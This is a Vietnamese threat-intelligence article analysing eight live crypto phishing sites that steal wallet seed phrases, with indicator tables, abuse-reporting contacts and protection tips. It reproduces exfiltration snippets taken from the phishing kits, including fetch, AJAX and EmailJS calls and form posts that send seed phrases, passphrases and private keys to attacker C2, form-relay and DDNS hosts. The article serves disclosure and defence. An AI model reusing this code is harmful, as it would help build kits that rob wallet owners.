Phân tích chi tiết về lừa đảo tiền điện tử:
Phân tích 8 vụ tấn công thực tế
Chúng tôi đã chặn được lưu lượng truy cập lừa đảo đang diễn ra, tiến hành phân tích ngược 5 công cụ đánh cắp cụm từ hạt giống và truy vết dữ liệu bị đánh cắp đến các bot Telegram, tài khoản EmailJS và các hệ thống nền tảng Phishing-as-a-Service.

Những gì chúng tôi đã phát hiện
Mỗi ngày, hàng nghìn người dùng tiền điện tử bị mất tiền vào tay các trang web lừa đảo trông không khác gì các dịch vụ ví tiền điện tử hợp pháp. Nhưng điều gì sẽ xảy ra phía sau Nút “Connect Wallet” giả mạo đó à? Cụm từ hạt giống của bạn thực sự được lưu ở đâu?
Chúng tôi đã chặn lưu lượng HTTP trực tiếp từ 5 trang web lừa đảo đang hoạt động, tải xuống toàn bộ mã nguồn của chúng và theo dõi từng điểm cuối rò rỉ dữ liệu đến đích cuối cùng. Cuộc điều tra này đã vạch trần toàn bộ cơ chế hoạt động của các vụ lừa đảo tiền điện tử hiện đại — từ các thủ đoạn thao túng tâm lý khiến bạn nhập cụm từ hạt giống, cho đến bot Telegram chuyển thông tin đó đến kẻ tấn công theo thời gian thực.
Tất cả các cụm từ hạt giống được trình bày trong bài viết này đều là dữ liệu thử nghiệm được tạo ngẫu nhiên. Không có thông tin đăng nhập thực nào bị rò rỉ trong quá trình điều tra này. Tất cả các trang web đã được báo cáo cho các nhà cung cấp dịch vụ lưu trữ và bộ phận xử lý vi phạm tương ứng.
Mô hình tấn công phổ quát
Mặc dù có thương hiệu và hệ thống nền tảng khác nhau, cả 8 trang web lừa đảo này đều tuân theo mô hình phễu tâm lý hoàn toàn giống hệt nhau:
Nhận định quan trọng: hiệu ứng động “Đang kết nối...” luôn được lập trình cố định để thất bại. Trong mã nguồn của Trang web số 4, chúng tôi đã phát hiện const success = false — không có bất kỳ nỗ lực kết nối ví nào. Toàn bộ quy trình này chỉ nhằm mục đích hướng nạn nhân đến biểu mẫu “Kết nối thủ công”.

8 địa điểm: Phân tích chi tiết
Mạo danh
Một “giao thức phi tập trung” hư cấu dành cho việc xác thực ví. Sử dụng bảng giá thời gian thực từ CryptoCompare và các liên kết đến các trình khám phá blockchain thực tế (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) để tăng tính xác thực. Trang đích hiển thị hơn 100 biểu tượng ví và quy trình "xác thực" gồm 3 bước.
Chuỗi thoát dữ liệu kép
Hệ thống backend tinh vi nhất trong số 5 hệ thống — mọi thông tin đăng nhập bị đánh cắp đều được chuyển qua hai kênh độc lập đồng thời:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on Render.com
| |
| +--> Telegram Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup) Kết quả điều tra OSINT
| Chỉ số | Giá trị |
|---|---|
| Email lừa đảo | Bestgrace309@gmail.com |
| Bot Telegram | @DewdropsTG_bot (ID: 7567323692) |
| Người nhận Telegram | @metatech2 (ID trò chuyện: 7350941887) |
| Hệ thống phía máy chủ | emailjs-backend-ovtg.onrender.com |
| Dịch vụ EmailJS | service_d5qigxs / template_7bqxeaa |
| Miền ẩn | layerschain.in (từ kỹ thuật che giấu địa chỉ email của CF) |
| Tin nhắn đã gửi | 1.824+ (từ ID tin nhắn trên Telegram) |
| Tuổi miền | 2 ngày (TLS: 25 tháng 3 năm 2026) |
Địa chỉ email của kẻ tấn công đã được tìm thấy trong một Lời bình luận bằng JavaScript bên trong config.js: // Bestgrace309@gmail.com. Họ đã quên gỡ bỏ nó trước khi triển khai. Ngoài ra, hệ thống trung gian Telegram hoàn toàn mở — không có xác thực, không có giới hạn tốc độ. Bằng cách giải mã dữ liệu từ Cloudflare data-cfemail ngoài việc làm mờ mã trong HTML, chúng tôi còn phát hiện ra một địa chỉ email ẩn: support@layerschain.in, kết nối với cơ sở hạ tầng lưu trữ của Ấn Độ và Nam Phi.
Mạo danh
Một bản sao hoàn hảo đến từng pixel của thực tế Aqualibre (AQLA) trang di chuyển token. Mã HTML chứa một thẻ siêu dữ liệu cho biết nguồn: data-scrapbook-source="https://token.aqla.app/migration", có dấu thời gian ngày 19 tháng 11 năm 2024.
Phương pháp Zero-Code
Kẻ tấn công này cần không có mã phía máy chủ. Biểu mẫu này gửi dữ liệu trực tiếp đến Không tĩnh — một hệ thống xử lý biểu mẫu hợp lệ dành cho các trang web tĩnh. Mỗi lần gửi biểu mẫu đều được chuyển tiếp đến địa chỉ email của kẻ lừa đảo. Địa chỉ email của kẻ tấn công là không bao giờ hiển thị trong mã nguồn.
<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>
Cloudflare Pages: miễn phí. Un-static Forms: miễn phí. Không mua tên miền. Không thuê máy chủ. Tổng chi phí cơ sở hạ tầng: không đô la.
Mạo danh
Tên miền con chứa "safpal" — một cách viết sai chính tả có chủ ý của SafePal, một ví phần cứng phổ biến. Trang web này tự xưng là "Blockchain Wallet Rectification" với 26 danh mục vấn đề giả mạo. Trang web sử dụng Typed.js để tạo hiệu ứng động cho tên các chuỗi khối (Ethereum, BSC, Polygon...) và một bảng hiển thị giá LiveCoinWatch nhằm tạo sự tin cậy.
Cùng một bộ thiết bị, cùng một người vận hành?
Sử dụng mẫu lừa đảo hoàn toàn giống hệt nhau như Địa điểm số 2:
giống hệt connect.html, giống hệt nhau wallets.html với hơn 60 biểu tượng, cùng một nền tảng Un-static (ID biểu mẫu khác nhau — 6f1b82c3...da9943af). Bộ dụng cụ giống hệt nhau này cho thấy rõ ràng rằng một nhà điều hành quản lý cả hai trang web.
Các lỗi chính tả trong mã nguồn: "Privay Policy" (thiếu chữ 'c'), "seperated" (phải là "separated"), "Kestore" (thiếu chữ 'y'). Trường mật khẩu sử dụng type="text" thay vì type="password".
Mạo danh
Một bản sao gần như hoàn hảo của Mạng Flare portal — một blockchain EVM Layer-1 thực sự với các giao thức FTSO và Data Connector. Sao chép hơn 30 đối tác trong hệ sinh thái, giao diện điều hướng và nhận diện thương hiệu. Biểu tượng favicon được tải từ một tên miền typosquat: portal.flaremainet.com (thiếu một chữ 'n' trong từ "mainnet").
Cơ chế dự phòng kép của EmailJS
Trang web duy nhất sử dụng hai tài khoản EmailJS riêng biệt cùng lúc để đảm bảo tính dự phòng chống Gỡ bỏ:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
}) Tiêu đề email cho mỗi vụ trộm cắp: "New Wallet Details from Flare".
Mã HTML chứa Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Tính năng bảo vệ PPC của Lunio, và một Pixel quảng cáo Twitter/X. Kẻ tấn công đang chạy quảng cáo trả phí để dụ các nạn nhân truy cập vào trang web lừa đảo và lọc các lần nhấp chuột của bot. Đây không phải là một sở thích — mà là một hoạt động được tài trợ, có hệ thống phân tích và chi tiêu cho quảng cáo.

Mạo danh
Một dịch vụ chung mang tên "COIN NODE" / "Wallet Fix" (không thuộc thương hiệu cụ thể nào). Bản quyền "Wallet Fix 2022" — mẫu bộ công cụ này đã có tuổi đời ít nhất 4 năm. Hình ảnh được lưu trữ trên pumpeth.com (WordPress trên AWS).
Dịch vụ lừa đảo qua email (Phishing-as-a-Service)
Kiến trúc backend đáng lo ngại nhất: một API đa người dùng dựa trên UUID:
POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+... Mỗi kẻ lừa đảo đều có một điểm cuối UUID riêng. Một nhà điều hành trung tâm chịu trách nhiệm duy trì API, theo dõi các chiến dịch và có thể nhận một phần tiền bị đánh cắp. Đây là trộm cắp tiền điện tử có tổ chức — mô hình “Phishing-as-a-Service”.
Cơ sở hạ tầng liên quan (Hầu như không còn hoạt động)
| Miền | Vai trò | Trạng thái |
|---|---|---|
| api.pulseresolve.com | API trích xuất dữ liệu | NXDOMAIN |
| walletissuesfix.net | Dịch vụ lưu trữ favicon | NXDOMAIN |
| syncwallet.online | Logo chủ nhà | NXDOMAIN |
| pumpeth.com | CDN hình ảnh | Trực tiếp (AWS) |
Phần backend đã ngừng hoạt động, nhưng Giao diện người dùng vẫn đang hoạt động trên Cloudflare Pages. Nếu kẻ tấn công đăng ký lại pulseresolve.com, trang web sẽ ngay lập tức hoạt động trở lại.
Mạo danh
A chiến dịch hai mũi nhọn: một “Trung tâm hỗ trợ” chung tại wallet-support-39n.pages.dev với 15 danh mục phát hành giả mạo và 39 thương hiệu ví, cùng với một Bản sao quy trình đăng ký Ledger với độ chính xác đến từng pixel tại ledger-recovery.support được lưu trữ trên Replit — bao gồm các tính năng chọn mẫu thiết bị, thiết lập mã PIN và bảng cụm từ hạt giống gồm 24 từ với Tính năng tự động hoàn thành BIP39 thực sự.
Hệ thống C2 chống quét
Trang hỗ trợ ví gửi dữ liệu bị đánh cắp đến api.uranustoken.org/log — một máy chủ điều khiển (C2) chạy trên nền tảng nginx/Ubuntu được tùy chỉnh, đặt phía sau Cloudflare. Phần backend cố ý từ chối tất cả các yêu cầu GET (trả về lỗi 522 do hết thời gian chờ), chỉ phản hồi với yêu cầu POST. Điều này có nghĩa là các công cụ quét URL, trình thu thập dữ liệu của Google Safe Browsing và các nhà nghiên cứu bảo mật khi gửi yêu cầu GET đến điểm cuối này sẽ không nhận được phản hồi nào — máy chủ C2 dường như đã ngừng hoạt động.
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.uranustoken.org",
allowedWallets: ["phantom","solfare","metamask","trustwallet",
"coinbasewallet","ledger","trezor","okx","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
} Bản sao của Ledger chạy một phần backend Express.js riêng biệt ngay trên chính Replit: POST /api/recovery-phrase thu thập {deviceId, pin, phrase}. Nó trả về 400 {"error":"Invalid data provided"} khi gặp dữ liệu đầu vào không hợp lệ — xác nhận rằng phần xử lý phía sau là đang hoạt động và đang được xác thực tích cực dữ liệu bị đánh cắp.
Kết quả điều tra OSINT
| Chỉ số | Giá trị |
|---|---|
| Giao diện người dùng (Ví) | wallet-support-39n.pages.dev |
| Giao diện người dùng (Ledger) | ledger-recovery.support (34.111.179.208) |
| C2 Hậu kỳ | api.uranustoken.org → nginx/1.24.0 Ubuntu |
| Các địa chỉ IP C2 | 104.21.60.163 / 172.67.198.35 (Cloudflare) |
| Replit Xác minh | a43d3852-5304-47af-a61b-f0f6f3912736 |
| Cơ quan đăng ký | Name.com (ledger-recovery.support) |
| Đã triển khai | Ngày 9 tháng 1 năm 2026 (thẻ Last-Modified) |
| Công nghệ được sử dụng | React + Vite + Tailwind phiên bản 4.1 + Framer Motion |
Gói JS có dung lượng 466 KB chứa Danh sách từ đầy đủ theo tiêu chuẩn BIP39 đối với tính năng tự động hoàn thành theo thời gian thực, có 67 lần đề cập đến “passphrase” và 39 lần đề cập đến “mnemonic”. Bản sao Ledger này hướng dẫn nạn nhân thực hiện quy trình thiết lập ban đầu y hệt như một thiết bị Ledger chính hãng — đây là trang lừa đảo thuyết phục nhất trong toàn bộ cuộc điều tra này. Trang apiKey trường trong tệp cấu hình gợi ý một Kiến trúc PaaS đa người dùng.
Mạo danh
Một “Nền tảng ra mắt phi tập trung” chung với 21 loại mồi (Staking, Chuyển đổi, Xác minh danh tính (KYC), Chương trình tặng quà, Nhận phần thưởng, Khôi phục tài sản, Bán trước, Phát hành NFT, Tài khoản bị khóa...) và Hơn 70 thương hiệu ví — một trong những danh sách ví tiền điện tử đầy đủ nhất mà chúng tôi từng gặp. Lỗi chính tả dễ nhận ra “Sychronize” (thiếu chữ ‘n’) đã vạch trần đây là hàng giả.
Pipeline xử lý FormSubmit
Công dụng FormSubmit.co — một dịch vụ chuyển đổi biểu mẫu sang email hợp pháp. Giá trị băm của điểm cuối a2cf4131f1a5d39453c7c183df96f86f là giá trị MD5 của địa chỉ email của kẻ lừa đảo. Chúng tôi đã thử hàng trăm mẫu địa chỉ email theo phương pháp dò tìm toàn bộ trên các dịch vụ Gmail, Yahoo, Hotmail, ProtonMail, Yandex và Mail.ru — không tìm thấy kết quả phù hợp. Kẻ lừa đảo sử dụng một địa chỉ email hiếm gặp hoặc được tạo ngẫu nhiên.
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
}); Kết quả điều tra OSINT
| Chỉ số | Giá trị |
|---|---|
| Miền | mainnetvalidationapp.pages.dev |
| Hash khi gửi biểu mẫu | a2cf4131f1a5d39453c7c183df96f86f |
| Mã chiến dịch | ỨNG DỤNG PHÂN CẤP (DAPP) |
| Bộ công cụ FontAwesome | bdc3291137 (bộ sản phẩm số 112310842, phiên bản miễn phí v6.7.2) |
| jQuery | 3.2.1 và 3.5.1 được tải đồng thời |
| Bootstrap | CSS 5.2.2 + JS 5.3.0-alpha1 (không tương thích) |
Bộ công cụ FontAwesome bdc3291137 — FontAwesome có thể xác định chủ sở hữu tài khoản liên quan đến ID bộ công cụ này. Thẻ chiến dịch DAPP DECENTRALIZED có thể xuất hiện trên các trang web lừa đảo khác sử dụng cùng một giá trị băm FormSubmit. Sau khi đánh cắp cụm từ hạt giống, một mã QR giả và mã tham chiếu ngẫu nhiên gồm 7 ký tự hiển thị thông báo: “Hãy liên hệ với Quản trị viên và cung cấp mã tham chiếu duy nhất của bạn” — khiến các nạn nhân phải chờ đợi thay vì tiến hành điều tra.
Mạo danh
Không rõ — cả phần frontend lẫn phần backend đều đang ngoại tuyến. Dựa trên cấu trúc của payload, đây là một phần mềm đánh cắp cụm từ hạt giống của ví tiền điện tử. Cái Bucket công khai Cloudflare R2 (lưu trữ đối tượng, không phải Pages) là một phương thức lừa đảo qua email đã được ghi chép đầy đủ với hơn 5.000 trang web độc hại đã được phát hiện và lưu lượng truy cập tăng gấp 61 lần theo báo cáo của Netskope.
Cấu hình cho người mới bắt đầu
Điều quan trọng nhất phép toán cơ bản trong bộ sưu tập này. Các cụm từ hạt giống được gửi đi từng từ một đến một tập lệnh PHP đang chạy trên máy tính cá nhân hoặc máy chủ ảo (VPS) được kết nối qua dịch vụ DNS động miễn phí:
POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access Kết quả điều tra OSINT
| Chỉ số | Giá trị |
|---|---|
| Giao diện người dùng | pub-519769e9eb634616b1746c2018641d56.r2.dev [NGỪNG HOẠT ĐỘNG] |
| Hệ thống phía máy chủ | mercifuljigga4real123.publicvm.com [NXDOMAIN] |
| Mã nhận dạng xô R2 | 519769e9eb634616b1746c2018641d56 |
| Nhà cung cấp dịch vụ DDNS | DNSExit.com / Netdorm, Inc. (Cincinnati, OH) |
| DNS NS | ns10–13.dnsexit.com |
| Tên người dùng | mercifuljigga4real123 |
"Merciful" + "jigga" (biệt danh của Jay-Z) + "4real" + "123" — một biệt danh mang đậm dấu ấn cá nhân, thể hiện sự gắn bó với văn hóa hip-hop. Không tìm thấy trên bất kỳ nền tảng nào được lập chỉ mục: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch hoặc Steam. Có khả năng người này đang hoạt động trên Discord, Telegram hoặc các nền tảng trò chơi với tên này hoặc các biến thể tương tự. Tên tệp fuc.php phù hợp với phong cách táo bạo của tay cầm.
7 cách để đánh cắp cụm từ hạt giống của bạn

| Phương pháp | Các trang web | Cách thức hoạt động | Tốc độ | Chi phí |
|---|---|---|---|---|
| Bot Telegram | #1 | Express.js trên Render.com hoạt động như một máy chủ trung gian cho Bot API. Kẻ lừa đảo sẽ nhận được tin nhắn trực tiếp (DM) ngay lập tức kèm theo thông tin đăng nhập. | Thời gian thực | $0 |
| EmailJS | #1, #4 | JavaScript phía máy khách gửi trực tiếp đến API EmailJS, sau đó API này sẽ chuyển tiếp đến địa chỉ email của kẻ lừa đảo. | ~1 phút | $0 |
| Các biểu mẫu không tĩnh | #2, #3 | Biểu mẫu HTML tiêu chuẩn sử dụng phương thức POST gửi dữ liệu đến một dịch vụ biểu mẫu hợp lệ, dịch vụ này sẽ chuyển tiếp các dữ liệu được gửi qua email. | ~1 phút | $0 |
| FormSubmit.co | #7 | jQuery AJAX gửi đến FormSubmit.co. Địa chỉ email được ẩn sau hàm băm MD5. Chiến dịch được gắn thẻ là "DAPP DECENTRALIZED". | ~1 phút | $0 |
| API C2 tùy chỉnh | #6 | Ứng dụng React SPA gửi yêu cầu đến API nginx/Express được triển khai phía sau Cloudflare. Bỏ qua các yêu cầu GET (522) để tránh bị máy quét phát hiện. Chỉ phản hồi với yêu cầu POST. | Thời gian thực | ~5 USD/tháng |
| PHP + DDNS | #8 | Tập lệnh PHP chạy trên máy tính cá nhân thông qua dịch vụ DNS miễn phí (publicvm.com). Cụm từ hạt giống được gửi từng từ một. | Thời gian thực | $0 |
| API PhaaS | #5 | API đa người dùng dựa trên UUID. Nhà điều hành trung tâm quản lý hệ thống nền, còn những kẻ lừa đảo thì thuê các điểm cuối. | Thời gian thực | Không rõ |
7 dấu hiệu cảnh báo giúp phát hiện mọi trang web lừa đảo
Nếu bạn thấy bất kỳ Trong số đó, hãy đóng tab ngay lập tức:
Các kết nối ví thực sự sử dụng giao thức WalletConnect hoặc tiện ích mở rộng trình duyệt. Chúng không bao giờ hiển thị thông báo lỗi “Kết nối không thành công” yêu cầu bạn nhập cụm từ hạt giống.
Mỗi biểu tượng ví đều dẫn đến cùng một biểu mẫu. Một dịch vụ thực sự sẽ tích hợp SDK thực tế của từng ví.
Thông báo lỗi giả mạo “503 Error” hoặc “Unknown Error” xuất hiện sau khi gửi là do cố ý. Dữ liệu của bạn đã bị đánh cắp — thông báo lỗi này nhằm lừa bạn thử lại bằng một ví khác.
Cả 5 trang web này đều lạm dụng gói miễn phí của Cloudflare Pages. Không yêu cầu xác minh danh tính. Tình trạng lạm dụng Cloudflare Pages để lừa đảo đã tăng 198% vào năm 2025.
Không có dịch vụ hợp pháp nào cần cả ba loại thông tin xác thực này. Mẫu biểu có ba ô này là một dấu hiệu đặc trưng của bộ công cụ lừa đảo.
Không có trang web nào trong số này tải được ethers.js, web3.js, hoặc thực hiện bất kỳ lệnh gọi RPC nào. Chúng chỉ là các biểu mẫu HTML thuần túy giả vờ là các ứng dụng phi tập trung (dApps).
Dịch vụ lưu trữ miễn phí + dịch vụ tạo biểu mẫu miễn phí + dịch vụ nhắn tin miễn phí = một chiến dịch lừa đảo hoàn chỉnh với chi phí 0 đô la. Nếu trang web không có tên miền thật, hãy cảnh giác.
Bảng xếp hạng IOC đầy đủ
Dành cho các đội ngũ an ninh, các nền tảng thông tin về mối đe dọa và những người báo cáo hành vi lạm dụng:
Tên miền & Cơ sở hạ tầng
| Miền | Loại | Trạng thái |
|---|---|---|
| networklayers.pages.dev | Giao diện người dùng của trang lừa đảo | Trực tiếp |
| token-aqla.pages.dev | Giao diện người dùng của trang lừa đảo | Trực tiếp |
| antiresolve-mysafpalnode.pages.dev | Giao diện người dùng của trang lừa đảo | Trực tiếp |
| flaremainnet.pages.dev | Giao diện người dùng của trang lừa đảo | Trực tiếp |
| swiftauthapps.pages.dev | Giao diện người dùng của trang lừa đảo | Trực tiếp |
| emailjs-backend-ovtg.onrender.com | Hệ thống xử lý phía sau của TG relay | Trực tiếp |
| portal.flaremainet.com | Tài sản liên quan đến typosquatting | Không rõ |
| layerschain.in | Miền liên quan | DNS không hoạt động |
| api.pulseresolve.com | Hệ thống nền tảng PhaaS | NXDOMAIN |
| walletissuesfix.net | Máy chủ lưu trữ tài sản | NXDOMAIN |
| syncwallet.online | Logo chủ nhà | NXDOMAIN |
| pumpeth.com | CDN hình ảnh | Trực tiếp (AWS) |
| wallet-support-39n.pages.dev | Giao diện người dùng của trang lừa đảo | Trực tiếp |
| ledger-recovery.support | Lừa đảo qua Ledger (Replit) | Trực tiếp |
| api.uranustoken.org | Hệ thống backend C2 (nginx/Ubuntu) | Trực tiếp |
| uranustoken.org | Miền gốc | 404 |
| mainnetvalidationapp.pages.dev | Giao diện người dùng của trang lừa đảo | Trực tiếp |
| pub-519769e9eb634616b1746c2018641d56.r2.dev | Lừa đảo qua email (nhóm R2) | Chế độ ngoại tuyến |
| mercifuljigga4real123.publicvm.com | Phần backend PHP (DDNS) | NXDOMAIN |
Tài khoản và Mã định danh
| Loại | Giá trị | Trang web |
|---|---|---|
| Bestgrace309@gmail.com | #1 | |
| Email (đã ẩn) | support@layerschain.in | #1 |
| Bot Telegram | @DewdropsTG_bot (7567323692) | #1 |
| Người dùng Telegram | @metatech2 (7350941887) | #1 |
| EmailJS #1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 |
| EmailJS #2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 |
| EmailJS #3 | service_isy47de / JsVEgXVcaSTro1etu | #4 |
| Biểu mẫu không tĩnh | c78173e2d991...94c3f76 | #2 |
| Biểu mẫu không tĩnh | 6f1b82c3ce55...da9943af | #3 |
| UUID của PhaaS | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 |
| GTM | GTM-WX2D2TR | #4 |
| MS Clarity | j4bllybjkp | #4 |
| Thực thể hiển thị | rndr-id: ed83576e-b1b3-4c82 | #1 |
| Replit Xác minh | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 |
| MD5 của FormSubmit | a2cf4131f1a5d39453c7c183df96f86f | #7 |
| Thẻ chiến dịch | ỨNG DỤNG PHÂN CẤP (DAPP) | #7 |
| Bộ công cụ FontAwesome | bdc3291137 (bộ sản phẩm số 112310842) | #7 |
| Mã nhận dạng xô R2 | 519769e9eb634616b1746c2018641d56 | #8 |
| Tên người dùng/DDNS | mercifuljigga4real123 | #8 |
Nên báo cáo các vụ lừa đảo qua tiền điện tử ở đâu

| Dịch vụ | Những nội dung cần báo cáo | Làm thế nào |
|---|---|---|
| Cloudflare | 7 tài khoản .pages.dev + 1 thùng R2 | abuse.cloudflare.com |
| Google Safe Browsing | Tất cả các URL lừa đảo | Báo cáo lừa đảo |
| PhishTank | Tất cả các URL trong danh sách chặn của cộng đồng | phishtank.org |
| EmailJS | 3 tài khoản bị lạm dụng (ID dịch vụ nêu trên) | abuse@emailjs.com |
| Không tĩnh | 2 điểm cuối biểu mẫu | Liên hệ qua un-static.com |
| Render.com | Hệ thống trung gian phía máy chủ của Telegram | Hiển thị biểu mẫu báo cáo lạm dụng |
| Telegram | @DewdropsTG_bot + @metatech2 | telegram.org/support |
| Google (Gmail) | Bestgrace309@gmail.com | Báo cáo vi phạm của Google |
| Twitter/X | Tài khoản quảng cáo quảng bá Trang web số 4 | Báo cáo lạm dụng quảng cáo X |
| FormSubmit.co | Hash a2cf4131... (#7) | Mẫu báo cáo lạm dụng FormSubmit |
| Replit | ledger-recovery.support (#6) | Báo cáo vi phạm trên Replit |
| Name.com | Đơn vị đăng ký cho ledger-recovery.support | Lạm dụng dịch vụ Name.com |
| DNSExit | mercifuljigga4real123.publicvm.com | Lạm dụng trên dnsexit.com |
| FontAwesome | Bộ sản phẩm bdc3291137 (#7) | Việc lạm dụng FontAwesome |
| Chainabuse | Tất cả các chiến dịch lừa đảo | Chainabuse.com |
Cách bảo vệ bản thân
Không có dịch vụ hợp pháp nào bao giờ yêu cầu bạn nhập cụm từ hạt giống vào một trang web cả. Các cụm từ hạt giống chỉ được nhập vào phần mềm ví chính thức trong quá trình khôi phục ví — tuyệt đối không được nhập trên các trang web của bên thứ ba có chức năng “xác thực”, “đồng bộ hóa” hoặc “khôi phục”.
Trước khi kết nối bất kỳ ví nào:
- Hãy xác minh xem URL có trùng khớp với tên miền chính thức hay không. Kiểm tra thông tin chi tiết của chứng chỉ SSL.
- Real WalletConnect sử dụng mã QR hoặc liên kết sâu — tuyệt đối không bao giờ sử dụng biểu mẫu cụm từ hạt giống.
- Nếu xuất hiện thông báo “kết nối không thành công” và bạn được yêu cầu nhập thông tin đăng nhập thủ công — đó là một vụ lừa đảo.
- Kiểm tra các liên kết đáng ngờ trên PhishTank hoặc VirusTotal trước khi tương tác.
- Hãy sử dụng ví phần cứng — loại ví này yêu cầu xác nhận vật lý cho mỗi giao dịch.
- Hãy lưu lại các URL chính thức. Đừng bao giờ nhấp vào các liên kết từ quảng cáo, tin nhắn trực tiếp (DM) hoặc mạng xã hội.
Hệ thống phân loại các hình thức lừa đảo tiền điện tử
Những kẻ đánh cắp cụm từ hạt giống chỉ là một trong nhiều loại. Dưới đây là bức tranh toàn cảnh về các hình thức lừa đảo tiền điện tử — chúng tôi sẽ tiếp tục phân tích sâu hơn về từng loại.
Sự thật khó chấp nhận
Chi phí để thiết lập một chiến dịch lừa đảo tiền điện tử là $0 và mất dưới 30 phút. Dịch vụ lưu trữ miễn phí, dịch vụ biểu mẫu miễn phí, bot nhắn tin miễn phí. Kẻ tấn công đứng sau Trang web số 1 đã thu thập được thông tin đăng nhập từ Hơn 1.824 nạn nhân. Trang web số 4 đang hoạt động quảng cáo trả phí trên quy mô lớn. Đây không phải là chuyện của những người nghiệp dư — đây là cả một ngành công nghiệp. Cách phòng vệ duy nhất là nâng cao nhận thức.
Hãy cùng chúng tôi chống lại
PhishDestroy theo dõi và báo cáo các trang web lừa đảo tiền điện tử theo thời gian thực. Nếu bạn phát hiện một trang web đáng ngờ, hãy báo cáo cho chúng tôi — chúng tôi sẽ điều tra và nỗ lực để trang web đó bị gỡ xuống.



